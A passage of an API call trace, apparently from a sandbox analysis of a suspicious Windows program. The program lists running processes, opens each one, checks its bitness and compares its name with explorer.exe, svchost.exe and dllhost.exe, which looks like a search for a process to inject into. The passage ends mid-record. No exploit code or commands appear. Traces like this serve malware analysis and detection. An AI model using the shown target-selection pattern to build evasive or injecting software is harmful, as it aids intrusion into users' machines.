Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0251.204] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0251.204] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0251.205] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0251.205] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0251.206] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0251.206] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0251.206] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0251.206] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0251.207] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0251.207] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0251.208] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0251.208] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0251.208] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0251.208] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.209] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0251.209] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0251.210] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.210] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0251.210] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.211] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0251.211] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.212] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0251.212] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0251.212] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0251.212] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.213] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0251.213] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0251.214] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0251.214] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0251.214] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.214] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.214] CloseHandle (hObject=0xec) returned 1 [0251.214] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0251.215] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0251.215] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0251.216] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0251.216] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.216] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.216] CloseHandle (hObject=0xec) returned 1 [0251.216] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0251.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0251.217] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0251.217] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0251.217] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0251.218] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0251.218] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.218] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.218] CloseHandle (hObject=0xec) returned 1 [0251.218] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0251.218] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0251.218] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0251.218] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0251.219] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0251.219] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.219] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.219] CloseHandle (hObject=0xec) returned 1 [0251.219] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0251.219] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0251.219] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0251.219] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0251.220] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0251.220] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.220] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.220] CloseHandle (hObject=0xec) returned 1 [0251.220] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0251.220] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0251.220] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0251.220] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0251.221] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0251.221] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.221] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.221] CloseHandle (hObject=0xec) returned 1 [0251.221] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0251.221] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0251.221] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0251.221] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0251.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0251.222] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.222] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.222] CloseHandle (hObject=0xec) returned 1 [0251.222] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0251.222] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0251.222] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0251.222] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0251.222] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0251.223] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.223] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.223] CloseHandle (hObject=0xec) returned 1 [0251.223] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0251.223] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0251.223] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0251.223] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0251.223] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0251.223] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.224] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.224] CloseHandle (hObject=0xec) returned 1 [0251.224] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0251.224] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0251.224] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0251.224] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0251.224] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0251.224] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.224] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.225] CloseHandle (hObject=0xec) returned 1 [0251.225] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0251.225] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0251.225] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0251.225] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0251.225] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0251.225] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.225] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.225] CloseHandle (hObject=0xec) returned 1 [0251.225] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0251.226] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0251.226] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0251.226] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0251.226] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0251.226] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.226] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.226] CloseHandle (hObject=0xec) returned 1 [0251.226] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0251.226] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0251.226] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0251.227] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0251.227] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0251.227] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.227] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.227] CloseHandle (hObject=0xec) returned 1 [0251.227] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0251.227] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0251.227] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0251.227] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0251.228] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0251.228] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.228] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.228] CloseHandle (hObject=0xec) returned 1 [0251.228] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0251.228] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0251.228] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0251.228] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0251.229] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0251.229] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.229] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.229] CloseHandle (hObject=0xec) returned 1 [0251.229] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0251.229] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0251.229] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0251.229] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0251.230] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0251.230] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.230] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.230] CloseHandle (hObject=0xec) returned 1 [0251.230] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0251.230] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0251.230] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0251.230] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0251.231] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0251.231] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.231] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.231] CloseHandle (hObject=0xec) returned 1 [0251.231] lstrcmpiA (lpString1="wooden.exe", lpString2="explorer.exe") returned 1 [0251.231] lstrcmpiA (lpString1="wooden.exe", lpString2="svchost.exe") returned 1 [0251.231] lstrcmpiA (lpString1="wooden.exe", lpString2="dllhost.exe") returned 1 [0251.232] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0251.232] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0xec [0251.232] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.232] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.232] CloseHandle (hObject=0xec) returned 1 [0251.232] lstrcmpiA (lpString1="dallasr.exe", lpString2="explorer.exe") returned -1 [0251.232] lstrcmpiA (lpString1="dallasr.exe", lpString2="svchost.exe") returned -1 [0251.232] lstrcmpiA (lpString1="dallasr.exe", lpString2="dllhost.exe") returned -1 [0251.232] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0251.233] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5d8) returned 0xec [0251.233] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.233] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.233] CloseHandle (hObject=0xec) returned 1 [0251.233] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="explorer.exe") returned -1 [0251.233] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="svchost.exe") returned -1 [0251.233] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="dllhost.exe") returned -1 [0251.233] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0251.234] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d8) returned 0xec [0251.234] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.234] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.234] CloseHandle (hObject=0xec) returned 1 [0251.234] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="explorer.exe") returned -1 [0251.234] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="svchost.exe") returned -1 [0251.234] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="dllhost.exe") returned -1 [0251.234] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0251.235] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0xec [0251.235] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.235] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0251.235] CloseHandle (hObject=0xec) returned 1 [0251.235] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="explorer.exe") returned 1 [0251.235] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="svchost.exe") returned -1 [0251.235] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="dllhost.exe") returned 1 [0251.235] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, 